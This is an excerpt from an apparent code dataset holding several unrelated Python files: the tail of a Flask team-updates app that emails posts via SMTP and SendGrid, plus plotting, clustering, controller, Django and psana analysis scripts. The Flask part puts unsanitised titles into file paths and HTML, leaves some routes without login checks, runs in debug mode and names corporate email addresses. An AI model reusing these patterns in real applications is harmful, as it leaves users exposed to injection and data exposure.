', methods=['GET', 'POST'])\n@is_logged_in\ndef delete_update(id):\n # Execute\n update_delete = BlogPost.query.get_or_404(id)\n db.session.delete(update_delete)\n # Commit DB\n db.session.commit()\n flash(\"Updates deleted!\", 'success')\n return redirect(url_for('dashboard'))\n\n\n@app.route('/contactus')\ndef contactus():\n return render_template('contact_us.html')\n\n\n@app.route('/send_mail', methods=['POST'])\n@is_logged_in\ndef send_mail():\n me = \"nam-qa-update@microfocus.com\"\n you = \"mohamediburahimsha.s@microfocus.com\"\n #\n team_updates = BlogPost.query.all()\n app.logger.info(team_updates)\n message = MIMEMultipart('alternative')\n message['Subject'] = \"Weekly Staff Updates\"\n message['From'] = me\n message['To'] = you\n html = \"\"\"\\\n \n \n \n \n Updates Mail\n \n \n Weekly Team Updates
\n
\"\"\"\n for d in team_updates:\n name = d.name\n body = d.body\n html = html + \"\"\n html = html + name + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n\n html = html + \"\"\"\n \n \"\"\"\n # Record the MIME types of both parts - text/plain and text/html.\n # part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html, 'html')\n\n # Attach parts into message container.\n # According to RFC 2046, the last part of a multipart message, in this case\n # the HTML message, is best and preferred.\n # msg.attach(part1)\n message.attach(part2)\n\n # Send the message via local SMTP server.\n s = smtplib.SMTP('smtp.microfocus.com:25')\n # sendmail function takes 3 arguments: sender's address, recipient's address\n # and message to send - here it is sent as one string.\n s.sendmail(me, you, message.as_string())\n s.quit()\n flash(\"Message sent successfully!\", 'success')\n return redirect(url_for('dashboard'))\n\n\n@app.route('/send_mail_dashboard', methods=['POST'])\n@is_logged_in\ndef send_mail_dashboard():\n username = 'apikey'\n sender_email = \"flask-app-noreply@nam-qa-mf.com\"\n receiver_email = session['email']\n # password = os.environ.get('SENDGRID_API_KEY')\n password = global_app_key\n #\n team_updates = None\n user01 = None\n if session['username'] == 'admin':\n team_updates = BlogPost.query.all()\n else:\n user01 = BlogPost.query.filter_by(author=session['username']).first()\n app.logger.info(team_updates)\n app.logger.info(user01)\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = \"Weekly Team Updates\"\n message[\"From\"] = sender_email\n message[\"To\"] = receiver_email\n html = \"\"\"\\\n \n \n \n \n Updates Mail\n \n \n Weekly Team Updates
\n
\"\"\"\n if session['username'] == 'admin':\n if team_updates is not None:\n for d in team_updates:\n name = d.name\n body = d.body\n html = html + \"\"\n html = html + name + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n else:\n flash(\"Sorry ! No updates available for the user!\", 'danger')\n return redirect(url_for('dashboard'))\n else:\n if user01 is not None:\n name = user01.name\n body = user01.body\n html = html + \"\"\n html = html + name + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n else:\n flash(\"Sorry ! No updates available for the user!\", 'danger')\n return redirect(url_for('dashboard'))\n\n html = html + \"\"\"\n \n \"\"\"\n # Record the MIME types of both parts - text/plain and text/html.\n # part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html, 'html')\n\n # Attach parts into message container.\n # According to RFC 2046, the last part of a multipart message, in this case\n # the HTML message, is best and preferred.\n # msg.attach(part1)\n message.attach(part2)\n\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.sendgrid.net\", 465, context=context) as server:\n server.login(username, password)\n server.sendmail(\n sender_email, receiver_email, message.as_string()\n )\n flash(\"Mail sent successfully!\", 'success')\n return redirect(url_for('dashboard'))\n\n\n# @app.route('/send_article', methods=['GET', 'POST'])\n# @is_logged_in\n# def send_article():\n# me = \"nam-qa-update@microfocus.com\"\n# you = \"mohamediburahimsha.s@microfocus.com\"\n# #\n# d = Articles.query.get_or_404(1)\n# app.logger.info(d)\n# message = MIMEMultipart('alternative')\n# message['Subject'] = \"Weekly Staff Updates\"\n# message['From'] = me\n# message['To'] = you\n# html = \"\"\"\\\n# \n# \n# \n# \n# Articles\n# \n# \n# \"\"\"\n# # for d in article_data:\n# title = d.title\n# author = d.author\n# date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n# body = d.body\n# body = re.sub(r'(
\"\n# html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n# html = html + \"
\"\n# html = html + \"\"\n# html = html + body + \"
\"\n# html = html + \"
\"\n# html = html + \"\"\"\n# \n# \"\"\"\n# html_file = open(\"upload/\" + title + \".html\", \"w\")\n# html_file.write(html)\n# html_file.close()\n# # Record the MIME types of both parts - text/plain and text/html.\n# # part1 = MIMEText(text, 'plain')\n# config = pdfkit.configuration(wkhtmltopdf=\"C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe\")\n# part2 = MIMEText(html, 'html')\n# pdfkit.from_file('upload/' + title + '.html', 'upload/' + title + '.pdf', configuration=config)\n# # pdf = pdfkit.from_file('article.html', False)\n# filename = 'upload/' + title + '.pdf'\n# fo = open(filename, 'rb')\n# attach = email.mime.application.MIMEApplication(fo.read(), _subtype=\"pdf\")\n# fo.close()\n# attach.add_header('Content-Disposition', 'attachment', filename=filename)\n#\n# app.logger.info(html)\n#\n# mail_body = \"\"\"\\\n# \n# \n# \n# \n# Articles\n# \n# \n# Hello Reader
\n# Thanks for downloading this article, your article has been attached in the mail
\n# Please share your valuable feedback to us !
\n# Happy Learning!
\n# Thanks | Flask app Developers
\n# \"\"\"\n# part_subject = MIMEText(mail_body, 'html')\n# # Attach parts into message container.\n# # According to RFC 2046, the last part of a multipart message, in this case\n# # the HTML message, is best and preferred.\n# # msg.attach(part1)\n# message.attach(attach)\n# message.attach(part_subject)\n#\n# # Send the message via local SMTP server.\n# s = smtplib.SMTP('smtp.microfocus.com:25')\n# # sendmail function takes 3 arguments: sender's address, recipient's address\n# # and message to send - here it is sent as one string.\n# s.sendmail(me, you, message.as_string())\n# s.quit()\n# flash(\"Message sent successfully!\", 'success')\n# return redirect(url_for('articles'))\n\n\n@app.route('/send_article', methods=['GET', 'POST'])\n@is_logged_in\ndef send_article():\n # me = \"nam-qa-update@microfocus.com\"\n # you = \"mohamediburahimsha.s@microfocus.com\"\n # #\n d = Articles.query.get_or_404(1)\n app.logger.info(d)\n # message = MIMEMultipart('alternative')\n # message['Subject'] = \"Weekly Staff Updates\"\n # message['From'] = me\n # message['To'] = you\n html = \"\"\"\\\n \n \n \n \n Articles\n \n \n \"\"\"\n # for d in article_data:\n title = d.title\n author = d.author\n date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n body = d.body\n # body = re.sub(r'(
\"\n html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n html = html + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n html = html + \"\"\"\n \n \"\"\"\n html_file = open(basedir + \"/upload/\" + title + \".html\", \"w\")\n html_file.write(html)\n html_file.close()\n # Record the MIME types of both parts - text/plain and text/html.\n # part1 = MIMEText(text, 'plain')\n # config = pdfkit.configuration(wkhtmltopdf=\"C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe\")\n # config = pdfkit.configuration(wkhtmltopdf=\"/usr/local/bin/wkhtmltopdf\")\n part2 = MIMEText(html, 'html')\n # pdfkit.from_file(basedir+'/upload/' + title + '.html', basedir+'/upload/' + title + '.pdf', configuration=config)\n # app.logger.info(basedir + '/upload/' + title + '.pdf')\n # pdfkit.from_file(basedir + '/upload/' + title + '.html', basedir + '/upload/' + title + '.pdf')\n # pdf = pdfkit.from_file('article.html', False)\n\n # filename = basedir+'/upload/' + title + '.pdf'\n # with open(filename, 'rb') as f:\n # data = f.read()\n # f.close()\n # encoded = base64.b64encode(data).decode()\n # attachment = Attachment()\n # attachment.file_content = FileContent(encoded)\n # attachment.file_type = FileType('application/pdf')\n # attachment.file_name = FileName(title + '.pdf')\n # attachment.disposition = Disposition('attachment')\n # attachment.content_id = ContentId('Example Content ID')\n # message.attachment = attachment\n # app.logger.info(html)\n mail_body = \"\"\"\\\n \n \n \n \n Articles\n \n \n Hello \"\"\" + session['name'] + \"\"\",
\n Thanks for downloading this article, your article has been attached in the mail
\n Please share your valuable feedback to us !
\n Happy Learning!
\n Thanks | Flask app Developers
\n \"\"\"\n message = Mail(\n from_email='flaskapp@nam-qa-mf.com',\n to_emails=To(session['email']),\n subject='Article from flaskapp - ' + title + '.pdf',\n html_content='and easy to do anywhere, even with Python')\n try:\n sg = sendgrid.SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(str(e))\n flash(\"Message sent successfully!\", 'success')\n return redirect(url_for('articles'))\n\n\ndef html_creation(art_id):\n d = Articles.query.get_or_404(art_id)\n title = d.title\n author = d.author\n date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n body = d.body\n app.logger.info(body)\n html = \"\"\"\\\n \n \n \n \n Articles\n \n \n \"\"\"\n # body = re.sub(r'(
\"\n html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n html = html + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n html = html + \"\"\"\n \n \"\"\"\n\n html_file = open(basedir + \"/templates/htmltopdf/\" + title.replace(\" \", \"\") + \".html\", \"w\")\n html_file.write(html)\n html_file.close()\n\n\n@app.route('/send_article_new/', methods=['GET', 'POST'])\n@is_logged_in\ndef send_article_new(id):\n username = 'apikey'\n sender_email = \"flask-app-noreply@nam-qa-mf.com\"\n receiver_email = session['email']\n password = global_app_key\n\n d = Articles.query.get_or_404(id)\n title = d.title\n author = d.author\n date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n body = d.body\n app.logger.info(d)\n\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = title\n message[\"From\"] = sender_email\n message[\"To\"] = receiver_email\n html = \"\"\"\\\n \n \n \n \n Articles\n \n \n \"\"\"\n # body = re.sub(r'(
\"\n html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n html = html + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n html = html + \"\"\"\n \n \"\"\"\n mail_body = \"\"\"\\\n \n \n \n \n Articles\n \n \n Hello \"\"\" + session['name'] + \"\"\",
\n Thanks for downloading this article, your article has been attached in the mail
\n Please share your valuable feedback to us !
\n Happy Learning!
\n Thanks | Flask app Developers
\n \"\"\"\n\n # html_file = open(basedir + \"/upload/\" + title + \".html\", \"w\")\n # html_file.write(html)\n # html_file.close()\n # part1 = MIMEText(mail_body, \"html\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part2)\n # message.attach(part2)\n # HTML(basedir+'/upload/' + title + '.html').write_pdf(basedir+'/upload/' + title + '.pdf')\n # pdf = HTML(basedir+'/upload/' + title + '.html').write_pdf()\n # open(basedir + \"/upload/\" + title + \".pdf\", 'wb').write(pdf)\n # config = pdfkit.configuration(wkhtmltopdf='/usr/local/bin/wkhtmltopdf')\n # pdfkit.from_file(basedir+'/upload/' + title + '.html', basedir+'/upload/' + title + '.pdf', configuration=config)\n\n # filename = basedir+'/upload/' + title + '.pdf'\n # attachment = open(filename, \"rb\")\n #\n # part = MIMEBase('application', 'octet-stream')\n # part.set_payload(attachment.read())\n # encoders.encode_base64(part)\n # part.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n #\n # message.attach(part)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.sendgrid.net\", 465, context=context) as server:\n server.login(username, password)\n server.sendmail(\n sender_email, receiver_email, message.as_string()\n )\n flash(\"Mail sent successfully!\", 'success')\n return redirect(url_for('article', id=id))\n\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=15)\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n return render_template('500.html'), 500\n\n\n# User Details page\n@app.route('/user_details')\n@is_logged_in_admin_user\ndef user_details():\n # Get articles\n result = db.session.query(Users).count()\n users = Users.query.all()\n oauth_users = OAuth.query.all()\n\n if result > 0:\n return render_template('user_details.html', users=users, oauth_users=oauth_users)\n else:\n msg = \"No users Found\"\n return render_template('user_details.html', msg=msg)\n\n\n@app.route('/delete_user/', methods=['GET', 'POST'])\n@is_logged_in_admin_user\ndef delete_user(id):\n # Execute\n user_delete = Users.query.get_or_404(id)\n try:\n db.session.delete(user_delete)\n # Commit DB\n db.session.commit()\n flash(\"User deleted successfully!\", 'success')\n return redirect(url_for('user_details'))\n except sqlalchemy.exc.IntegrityError as e:\n flash(\"Check the foreign-key user details table, \"\n \"if user exists, please delete the user from foreign-key table and then try! \", 'danger')\n return redirect(url_for('user_details'))\n\n\n@app.route('/delete_ouser/', methods=['GET', 'POST'])\n@is_logged_in_admin_user\ndef delete_ouser(id):\n # Execute\n ouser_delete = OAuth.query.get_or_404(id)\n db.session.delete(ouser_delete)\n # Commit DB\n db.session.commit()\n flash(\"Oauth Foreign User deleted successfully!, Now you can delete from main users table\", 'success')\n return redirect(url_for('user_details'))\n\n\n@app.route('/url_links')\ndef url_links():\n # Get articles\n result = db.session.query(Urls).count()\n urls = Urls.query.all()\n\n if result > 0:\n return render_template('imp_links.html', urls=urls)\n else:\n msg = \"No links Found\"\n return render_template('imp_links.html', msg=msg)\n\n\n# URL Form Class\nclass URLUpdateForm(Form):\n url_name = StringField('URL Name', [validators.length(min=1, max=200)])\n url = StringField('URL', [validators.length(min=5)])\n\n\n@app.route('/add_url', methods=['GET', 'POST'])\ndef add_url():\n form = URLUpdateForm(request.form)\n if request.method == 'POST' and form.validate():\n url_name = form.url_name.data\n url = form.url.data\n # Execute\n urls = Urls(url_name=url_name, url=url)\n db.session.add(urls)\n # Commit DB\n db.session.commit()\n flash(\"Url added!\", 'success')\n return redirect(url_for('url_links'))\n return render_template('add_url.html', form=form)\n\n\n@app.route('/edit_url/', methods=['GET', 'POST'])\n@is_logged_in\ndef edit_url(id):\n # Get article by id\n url_edit = Urls.query.get_or_404(id)\n # Get form\n form = URLUpdateForm(request.form)\n # Populate the article form fields\n form.url_name.data = url_edit.url_name\n form.url.data = url_edit.url\n if request.method == 'POST' and form.validate():\n url_edit.url_name = request.form['url_name']\n url_edit.url = request.form['url']\n # Commit DB\n db.session.commit()\n flash(\"Updated successfully!\", 'success')\n return redirect(url_for('url_links'))\n return render_template('edit_url.html', form=form)\n\n\n@app.route('/delete_url/', methods=['GET', 'POST'])\n@is_logged_in\n@is_logged_in_admin_url\ndef delete_url(id):\n url_delete = Urls.query.get_or_404(id)\n db.session.delete(url_delete)\n # Commit DB\n db.session.commit()\n flash(\"Url deleted successfully!\", 'success')\n return redirect(url_for('url_links'))\n\n\n@app.route('/add_task', methods=['GET', 'POST'])\ndef add_task():\n if request.method == 'POST':\n task = request.form['task']\n name = request.form['name']\n status = request.form['status']\n # Execute\n tasks = Tasks(task=task, name=name, status=status)\n db.session.add(tasks)\n # Commit DB\n db.session.commit()\n flash(\"User task added!\", 'success')\n return redirect('/add_task')\n else:\n all_tasks = Tasks.query.all()\n all_users = Users.query.all()\n return render_template('dynamic_table.html', tasks=all_tasks, users=all_users)\n\n\n@app.route('/edit_task/', methods=['GET', 'POST'])\n@is_logged_in\ndef edit_task(task_id):\n task_edit = Tasks.query.get_or_404(task_id)\n all_users = Users.query.all()\n if request.method == 'POST':\n task_edit.task = request.form['task']\n task_edit.name = request.form['name']\n task_edit.status = request.form['status']\n task_edit.comments = request.form['comments']\n db.session.commit()\n flash(\"User task edited!\", 'success')\n return redirect('/add_user_task')\n else:\n return render_template('edit_task.html', tasks=task_edit, users=all_users)\n\n\n@app.route('/delete_task/', methods=['GET', 'POST'])\n@is_logged_in\ndef delete_task(task_id):\n task_delete = Tasks.query.get_or_404(task_id)\n db.session.delete(task_delete)\n # Commit DB\n db.session.commit()\n flash(\"Task deleted successfully!\", 'success')\n return redirect('/add_user_task')\n\n\n@app.route('/add_user_task', methods=['GET', 'POST'])\n@is_logged_in\ndef add_user_task():\n # cur = mysql.connection.cursor()\n # cur.execute(\"SELECT name, COUNT( name ) x FROM tasks GROUP BY name HAVING x >0\")\n # results = cur.fetchall()\n results = db.engine.execute(\"SELECT name, COUNT( name ) x FROM tasks GROUP BY name HAVING x >0\")\n if request.method == 'POST':\n task = request.form['task']\n name = request.form['name']\n status = request.form['status']\n # Execute\n tasks = Tasks(task=task, name=name, status=status)\n db.session.add(tasks)\n # Commit DB\n db.session.commit()\n flash(\"User task added!\", 'success')\n return redirect('/add_user_task')\n else:\n all_tasks = Tasks.query.all()\n all_users = Users.query.all()\n return render_template('user_task_list.html', tasks=all_tasks, users=all_users, total_tasks=results)\n\n\n# Profile_Page\n@app.route('/profile', methods=['GET', 'POST'])\n@is_logged_in\ndef profile():\n check = Users.query.filter_by(email=session['email']).first()\n if request.method == 'POST':\n check.name = request.form['name']\n check.username = request.form['username']\n check.email = request.form['email']\n db.session.commit()\n session['name'] = check.name\n session['username'] = check.username\n flash(\"Profile Updated!\", 'success')\n check = Users.query.filter_by(username=session['username']).first()\n return render_template('profile.html', check=check)\n return render_template('profile.html', check=check)\n\n\n# Change_Password\n@app.route('/old_pwd_change', methods=['GET', 'POST'])\n@is_logged_in\ndef old_pwd_change():\n check = Users.query.filter_by(username=session['username']).first()\n if request.method == 'POST':\n oldpwd = request.form['oldpwd']\n newpwd = request.form['newpwd']\n confpwd = request.form['confpwd']\n if sha256_crypt.verify(oldpwd, check.password):\n if newpwd == confpwd:\n check.password = sha256_crypt.hash(newpwd)\n db.session.commit()\n flash('Your password has been changed successfully!', 'success')\n return redirect(url_for('old_pwd_change'))\n else:\n flash('Password mismatched!', 'danger')\n return render_template('change_pwd1.html')\n else:\n flash('Incorrect old password !', 'danger')\n return render_template('change_pwd1.html')\n else:\n return render_template('change_pwd1.html')\n\n\n#\n# class AddCommentForm(Form):\n# comment = StringField(\"Comment\", [validators.DataRequired()])\n# submit = SubmitField(\"Post\")\n\n\n@app.route(\"/article//comment\", methods=[\"GET\", \"POST\"])\n@is_logged_in\ndef comment_post(article_id):\n # cmt_article = Articles.query.get_or_404(article_id)\n # form = AddCommentForm()\n if request.method == 'POST': # this only gets executed when the form is submitted and not when the page loads\n comment = request.form['comment']\n article_comment = Comments(comment=comment, article_id=article_id, user=session['username'])\n db.session.add(article_comment)\n db.session.commit()\n flash(\"Your comment has been added to the post\", \"success\")\n return redirect('/article/' + str(article_id))\n # return render_template(\"article\", article_id=article_id)\n # return render_template(\"article.html\", article_id=article_id)\n\n\n@app.route('/delete_comment//', methods=['GET', 'POST'])\n@is_logged_in\ndef delete_comment(comment_id, article_id):\n # Execute\n comment_delete = Comments.query.get_or_404(comment_id)\n db.session.delete(comment_delete)\n # Commit DB\n db.session.commit()\n flash(\"Comment deleted!\", 'success')\n return redirect('/article/' + str(article_id))\n\n\n@app.teardown_request\ndef session_clear(exception=None):\n db.session.remove()\n if exception and db.session.is_active:\n db.session.rollback()\n\n\nif __name__ == '__main__':\n app.run(debug=True, ssl_context='adhoc')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":63661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"348985515","text":"from math import *\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt \nfrom scipy.integrate import quad,dblquad\nfrom scipy import integrate \nimport csv\nfrom scipy.optimize import minimize\nfrom scipy.optimize import differential_evolution \nimport N_models \n\n\n\ndef fxn(Vg,E,l): \n T0=298\n T1=300 \n return N_models. E_act_fixedtemp_gatevoltage(Vg,E,l,T0,T1) \nvecComp = np.vectorize(fxn) \n\nE=0.7\nl=0.15 \n\t \nVg=np.linspace(-1.2,0.2,500) \n \nI=vecComp(Vg,E,l) \nplt.plot(Vg,I,color='blue',label='OPE3C')\n\n\n\n\n\ndef fxn(Vg,E,l): \n T0=190\n T1=300\n return N_models. E_act_fixedtemp_gatevoltage(Vg,E,l,T0,T1) \nvecComp = np.vectorize(fxn) \n\nE=0.7\nl=0.15 \t\n\t \nVg=np.linspace(-1.2,0.2,500) \n \nI=vecComp(Vg,E,l) \nplt.plot(Vg,I,color='green',label='OPE2C')\n\ndef fxn(Vg,E,l): \n T0=55\n T1=400\n return N_models. E_act_fixedtemp_gatevoltage(Vg,E,l,T0,T1) \nvecComp = np.vectorize(fxn) \n\nE=0.7 \nl=0.15\t \nVg=np.linspace(-1.2,0.2, 500) \n \nI=vecComp(Vg,E,l) \nplt.plot(Vg,I,color='red',label='OPE1C') \nplt.xlabel('Vg(V)') \nplt.ylabel('Ea(meV)') \nplt.title('Ea_vs_Vg for OPEnC_Neg') \nplt.legend() \nplt.show() \n\n","sub_path":"Ferrocene_project_codes/Ea_vs _ gate_code/Main_code.py","file_name":"Main_code.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"321799016","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\ndf = pd.read_csv(\"dota2Train.csv\", header=None)\ndata = np.asanyarray(df)\n\nkmeans = KMeans(n_clusters=2)\nmodel = kmeans.fit(data)\nclusters = model.labels_\n\nwin_counter = [0, 0]\nlose_counter = [0, 0]\n\nfor i in range(len(data)):\n if data[i][0] == 1:\n win_counter[clusters[i]] += 1\n elif data[i][0] == -1:\n lose_counter[clusters[i]] += 1\n\nprint(\"Cluster 1: \" + str(100 * win_counter[0]/sum(win_counter)) + \"% of total wins.\")\nprint(\"Cluster 1: \" + str(100 * lose_counter[0]/sum(lose_counter)) + \"% of total losses.\")\nprint(\"Cluster 2: \" + str(100 * win_counter[1]/sum(win_counter)) + \"% of total wins.\")\nprint(\"Cluster 2: \" + str(100 * lose_counter[1]/sum(lose_counter)) + \"% of total losses.\")","sub_path":"Machine Learning/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"242583571","text":"import numpy as np\nfrom vae import ConvVAE\nfrom lstm import MDNRNN\nimport torch\n\nIN_FILTERS = 3\nZ_DIM = 32\nA_DIM = 3\nRNN_H_DIM = 256\nNUM_MIXTURES = 5\nRNN_IN_DIM = Z_DIM + A_DIM\nRNN_OUT_DIM = Z_DIM\nDTYPE = torch.float16\n\nclass Controller:\n def __init__(self, load_model=True, use_gpu=False, cauchy_init=False):\n if use_gpu and torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n self.device = device\n\n self.vae = ConvVAE(IN_FILTERS, Z_DIM, cauchy_init=cauchy_init)\n self.lstm = MDNRNN(RNN_H_DIM, RNN_IN_DIM, RNN_OUT_DIM, NUM_MIXTURES, cauchy_init=cauchy_init)\n self.rnn_state = self.lstm.init_hidden(batch_size=1, device=device)\n\n if load_model:\n self.vae.load_state_dict(torch.load('models/vae.pt'))\n self.lstm.load_state_dict(torch.load('models/lstm.pt'))\n \n self.vae.eval()\n self.lstm.eval()\n self.vae.to(device=self.device)\n self.lstm.to(device=self.device)\n\n if cauchy_init:\n self.w = np.random.standard_cauchy((Z_DIM + RNN_H_DIM, A_DIM))\n self.b = np.random.standard_cauchy(A_DIM)\n else:\n self.w = np.random.randn(Z_DIM + RNN_H_DIM, A_DIM)\n self.b = np.random.randn(A_DIM)\n\n def get_z(self, obs):\n obs = obs.reshape(-1, 64, 64, 3)\n obs = obs.transpose(0, 3, 2, 1)\n image = obs / 255\n image = torch.tensor(image, dtype=DTYPE, device=self.device)\n mu, std = self.vae.get_mu_std(image)\n z = mu + std * torch.randn_like(mu)\n return z\n\n def reset_h(self):\n self.rnn_state = self.lstm.init_hidden(batch_size=1, device=self.device)\n\n def get_action(self, obs):\n z = self.get_z(obs)\n h, _ = self.rnn_state\n \n state = torch.cat((z, h[0]), dim=1)\n state = state.cpu().detach().numpy()\n action = np.tanh(np.dot(state, self.w) + self.b)\n action = action.reshape(-1)\n action[1] = (action[1] + 1) / 2\n action[2] = np.clip(action[2], 0, 1)\n\n action_tensor = torch.tensor(action, dtype=DTYPE, device=self.device)\n self.rnn_state = self.lstm.calc_next_state(z, action_tensor, self.rnn_state)\n \n return action\n ","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"510875785","text":"# coding=utf-8\n\"\"\"Update location context document.\"\"\"\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.gis.db import models\nfrom bims.models.location_site import (\n LocationSite,\n location_site_post_save_handler,\n)\n\n\nclass Command(BaseCommand):\n \"\"\"Update location site context document\n \"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n '-i',\n '--ignore-not-empty',\n dest='ignore_not_empty',\n default=False,\n help='Only update empty location context')\n\n def handle(self, *args, **options):\n ignore_not_empty = options.get('ignore_not_empty')\n if ignore_not_empty:\n location_sites = LocationSite.objects.filter(\n location_context_document__isnull=True,\n )\n else:\n location_sites = LocationSite.objects.filter(id=9344)\n num = len(location_sites)\n i = 1\n\n models.signals.post_save.disconnect(\n location_site_post_save_handler,\n )\n for location_site in location_sites:\n print('Updating %s of %s, %s' % (i, num, location_site.name))\n i += 1\n success, message = location_site.update_location_context_document()\n if not success:\n print('[FAILED] %s : %s' % (location_site.name, message))\n if success:\n location_site.save()\n\n models.signals.post_save.connect(\n location_site_post_save_handler,\n )\n","sub_path":"bims/management/commands/update_location_context_documents.py","file_name":"update_location_context_documents.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"110829370","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport sys\nimport math\nimport numpy as np\nfrom time import time\nimport psana\n\nfrom Detector.AreaDetector import AreaDetector\nfrom ImgAlgos.PyAlgos import PyAlgos, print_arr, print_arr_attr\nfrom pyimgalgos.PeakStore import PeakStore\nfrom pyimgalgos.GlobalUtils import subtract_bkgd\n\n##-----------------------------\n# Initialization of graphics\nfrom pyimgalgos.GlobalGraphics import store as sp\nimport pyimgalgos.GlobalGraphics as gg\n##-----------------------------\n\nntest = int(sys.argv[1]) if len(sys.argv)>1 else 1\nprint('Test # %d' % ntest)\n\n##-----------------------------\nSKIP = 0\nEVTMAX = 10 + SKIP\n#SKIP = 70024\n#EVTMAX = 1000000 + SKIP\nEVTPLOT = 1 \nDO_PLOT = True\n##-----------------------------\n\ndef do_print(i) :\n return True\n #return False\n #if i==1 : return True\n #return not i%10\n\n##-----------------------------\n \ndsname = 'exp=cxif5315:run=169'\nsrc = psana.Source('DetInfo(CxiDs2.0:Cspad.0)')\nprint('%s\\nExample for\\n dataset: %s\\n source : %s' % (85*'_',dsname, src))\n\n# Non-standard calib directory\n#psana.setOption('psana.calib-dir', './empty/calib')\npsana.setOption('psana.calib-dir', '/reg/d/psdm/CXI/cxif5315/calib')\n\nds = psana.DataSource(dsname)\nevt = next(ds.events())\nenv = ds.env()\n\nrunnum = evt.run()\n\n#run = ds.runs().next()\n#runnum = run.run()\n\n#for key in evt.keys() : print key\n\n##-----------------------------\n\ndet = AreaDetector(src, env, pbits=0)\nprint(85*'_', '\\nInstrument: %s run number: %d' % (det.instrument(), runnum))\n\nnda_peds = det.pedestals(evt)\nnda_bkgd = det.bkgd(evt)\nnda_smask = det.mask(evt, calib=False, status=True, edges=True, central=True, unbond=True, unbondnbrs=True)\n\n#print_arr_attr(nda_peds, 'nda_peds')\n#print_arr_attr(nda_bkgd, 'nda_bkgd')\n#print_arr_attr(nda_smask, 'nda_smask')\n##-----------------------------\n\nshape_cspad = (32,185,388)\n\nmask_arc = np.loadtxt('../rel-mengning/work/roi_mask_nda_arc.txt')\nmask_equ = np.loadtxt('../rel-mengning/work/roi_mask_nda_equ.txt')\nmask_img = np.loadtxt('../rel-mengning/work/roi_mask_nda_equ_arc.txt')\nmask_arc.shape = mask_equ.shape = mask_img.shape = shape_cspad\nprint_arr_attr(mask_arc, 'mask_arc')\n\n\nseg1 = np.ones((185,388))\nregs_check = np.zeros(shape_cspad)\nfor s in (4,12,20,28) : regs_check[s,10:100,270:370] = 20*seg1[10:100,270:370]\n\nwinds_bkgd = [ (s, 10, 100, 270, 370) for s in (4,12,20,28)] # use part of segments 4 and 20 to subtr bkgd\n\nwinds_arc = [ (s, 0, 185, 0, 388) for s in (0,1,7,8,9,15,16,17,23,24,25,31)]\nwinds_equ = [ (s, 0, 185, 0, 388) for s in (0,1,3,8,9,11,16,17,19,24,25,27)]\n#winds_all = [ (s, 0, 185, 0, 388) for s in (0,1,3,7,8,9,11,15,16,17,19,23,24,25,27,31)]\n\nprint_arr(winds_arc, 'winds_arc')\nprint_arr_attr(winds_arc, 'winds_arc')\n\nalg_arc = PyAlgos(windows=winds_arc, mask=mask_arc, pbits=2)\nalg_arc.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=0, son_min=10)\n#alg_arc.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=500, son_min=6) # for v2r1\n\nalg_equ = PyAlgos(windows=winds_equ, mask=mask_equ, pbits=0)\nalg_equ.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=0, son_min=10)\n#alg_equ.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=500, 